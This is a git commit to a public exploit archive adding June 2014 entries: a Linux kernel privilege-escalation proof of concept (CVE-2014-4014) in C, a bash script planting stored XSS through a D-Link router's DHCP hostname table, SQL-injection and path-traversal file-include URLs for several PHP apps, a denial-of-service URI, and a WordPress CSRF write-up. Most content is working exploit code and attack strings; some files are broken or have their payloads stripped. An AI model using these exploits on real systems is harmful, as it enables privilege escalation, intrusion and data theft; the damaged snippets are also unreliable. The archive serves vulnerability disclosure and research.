From 82e917475d1c308495059c25bf34adf0acd12029 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 22 Jun 2014 04:39:30 +0000 Subject: [PATCH] Updated 06_22_2014 --- files.csv | 7 +++ platforms/hardware/webapps/33822.sh | 32 ++++++++++++ platforms/linux/dos/33672.txt | 11 ++++ platforms/linux/local/33824.c | 72 ++++++++++++++++++++++++++ platforms/php/webapps/33809.txt | 21 ++++++++ platforms/php/webapps/33820.txt | 10 ++++ platforms/php/webapps/33821.html | 9 ++++ platforms/php/webapps/33823.txt | 80 +++++++++++++++++++++++++++++ 8 files changed, 242 insertions(+) create mode 100755 platforms/hardware/webapps/33822.sh create mode 100755 platforms/linux/dos/33672.txt create mode 100755 platforms/linux/local/33824.c create mode 100755 platforms/php/webapps/33809.txt create mode 100755 platforms/php/webapps/33820.txt create mode 100755 platforms/php/webapps/33821.html create mode 100755 platforms/php/webapps/33823.txt diff --git a/files.csv b/files.csv index 7ecf8ad17..8a3b9fdf4 100755 --- a/files.csv +++ b/files.csv @@ -30336,6 +30336,7 @@ id,file,description,date,author,platform,type,port 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 +33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service Vulnerability",2010-02-24,Nicob,linux,dos,0 33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0 33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0 @@ -30456,6 +30457,7 @@ id,file,description,date,author,platform,type,port 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888 33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 +33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0 @@ -30466,3 +30468,8 @@ id,file,description,date,author,platform,type,port 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,metasploit,windows,remote,8080 33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway Prior To 6.7.2 Hotfix 2 Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 +33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0 +33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0 +33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0 +33823,platforms/php/webapps/33823.txt,"Wordpress 3.9.1 - CSRF vulnerabilities",2014-06-21,"Avinash Thapa",php,webapps,0 +33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 diff --git a/platforms/hardware/webapps/33822.sh b/platforms/hardware/webapps/33822.sh new file mode 100755 index 000000000..136485c67 --- /dev/null +++ b/platforms/hardware/webapps/33822.sh @@ -0,0 +1,32 @@ +#!/bin/bash + +# Written and discovered by Yuval tisf Nativ +# The page 'dhcpinfo.html' will list all machines connected to the network with hostname, +# IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname. + +# Checks if you are root +if [ "$(id -u)" != "0" ]; then + echo "Please execute this script as root" + exit 1 +fi + +# You're XSS here +xss = "\"" + +# backup current hostname +currhost = `hostname` + +# Bannering +echo "" +echo " D-Link Persistent XSS by tisf" +echo "" +echo "The page dhcpinfo.html is the vulnerable page." +echo "Ask the user to access it and your persistent XSS will be triggered." +echo "" + +# Change hostname to XSS +sudo hosname $xss + +# Restore previous hostname on exit +pause "Type any key to exit and restore your previous hostname." +sudo hostname $currhost diff --git a/platforms/linux/dos/33672.txt b/platforms/linux/dos/33672.txt new file mode 100755 index 000000000..db18af034 --- /dev/null +++ b/platforms/linux/dos/33672.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/38395/info + +Kojoney is prone to a remote denial-of-service vulnerability. + +A remote attacker can exploit this issue to gain unauthorized access to local files and crash the affected application, resulting in a denial-of-service condition. + +Versions prior to Kojoney 0.0.4.2 are vulnerable. + +The following example URI is available: + +file://localhost/dev/urandom \ No newline at end of file diff --git a/platforms/linux/local/33824.c b/platforms/linux/local/33824.c new file mode 100755 index 000000000..c669bbb35 --- /dev/null +++ b/platforms/linux/local/33824.c @@ -0,0 +1,72 @@ +/** + * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC + * + * Vitaly Nikolenko + * http://hashcrack.org + * + * Usage: ./poc [file_path] + * + * where file_path is the file on which you want to set the sgid bit + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define STACK_SIZE (1024 * 1024) +static char child_stack[STACK_SIZE]; + +struct args { + int pipe_fd[2]; + char *file_path; +}; + +static int child(void *arg) { + struct args *f_args = (struct args *)arg; + char c; + + // close stdout + close(f_args->pipe_fd[1]); + + assert(read(f_args->pipe_fd[0], &c, 1) == 0); + + // set the setgid bit + chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR); + + return 0; +} + +int main(int argc, char *argv[]) { + int fd; + pid_t pid; + char mapping[1024]; + char map_file[PATH_MAX]; + struct args f_args; + + assert(argc == 2); + + f_args.file_path = argv[1]; + // create a pipe for synching the child and parent + assert(pipe(f_args.pipe_fd) != -1); + + pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args); + assert(pid != -1); + + // get the current uid outside the namespace + snprintf(mapping, 1024, "0 %d 1\n", getuid()); + + // update uid and gid maps in the child + snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid); + fd = open(map_file, O_RDWR); assert(fd != -1); + + assert(write(fd, mapping, strlen(mapping)) == strlen(mapping)); + close(f_args.pipe_fd[1]); + + assert (waitpid(pid, NULL, 0) != -1); +} diff --git a/platforms/php/webapps/33809.txt b/platforms/php/webapps/33809.txt new file mode 100755 index 000000000..2be23895f --- /dev/null +++ b/platforms/php/webapps/33809.txt @@ -0,0 +1,21 @@ + $$$$$$\ $$\ $$\ $$$$$$\ +$$ __$$\ $$ | $$ | $$ __$$\ +$$ / \__| $$ | $$ | $$ / \__| +$$ |$$$$\ $$$$$$$$ | \$$$$$$\ +$$ |\_$$ | $$ __$$ | \____$$\ +$$ | $$ | $$ | $$ | $$\ $$ | +\$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ | + \______/ \__|\__| \__|\__|\______/ + +# Exploit Title: Cacti - Superlinks Plugin SQL Injection +# Google Dork: inurl:"/cacti/plugins/superlinks/" +# Date: 18/06/2014 +# Exploit Author: Napsterakos +# Software Link: http://docs.cacti.net/plugin:superlinks + + +Link: http://localhost/cacti/plugins/superlinks/ + +Exploit: http://localhost/cacti/plugins/superlinks/superlinks.php?id=[SQLi] + +Credits to: Greek Hacking Scene \ No newline at end of file diff --git a/platforms/php/webapps/33820.txt b/platforms/php/webapps/33820.txt new file mode 100755 index 000000000..8fd801266 --- /dev/null +++ b/platforms/php/webapps/33820.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/39276/info + +PotatoNews is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +PotatoNews 1.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/newcopy/timeago.php?nid=../../../../../../../[file]%00 +http://www.example.com/update/timeago.php?nid=../../../../../../../[file]%00 \ No newline at end of file diff --git a/platforms/php/webapps/33821.html b/platforms/php/webapps/33821.html new file mode 100755 index 000000000..5afe0c4a9 --- /dev/null +++ b/platforms/php/webapps/33821.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39298/info + +n-cms-equipe is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +n-cms-equipe 1.1C-Debug is vulnerable; other versions may also be affected. + + #####coded by ahmadbady#####

N'CMS & N'Games local file include Vulnerability

vul1 file:/path/template/theme1/content/body.php

vul2 file:/path/template/theme1/content/includs.php

-----------------------------------

victim: path: file:    lfi code: 


 

\ No newline at end of file diff --git a/platforms/php/webapps/33823.txt b/platforms/php/webapps/33823.txt new file mode 100755 index 000000000..0e7ea04e1 --- /dev/null +++ b/platforms/php/webapps/33823.txt @@ -0,0 +1,80 @@ +# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability +# DATE:21st June,2014 + +# Author:Avinash Kumar Thapa + +#URL: localhost/wordpress/ + +#PATCH/FIX:Not fixed yet. + + + + +################################################################################################### + +Technical Details: + +This is the new version released by Wordpress. + +version is 3.9.1(Latest) + +##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php## + + + + +##################################################################################################### + +Exploit Code: + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + +########################################################################################################### + +---- + +-- Avinash + +a.k.a + +**SPID3R** + + + + +twitter: @m_avinash143 \ No newline at end of file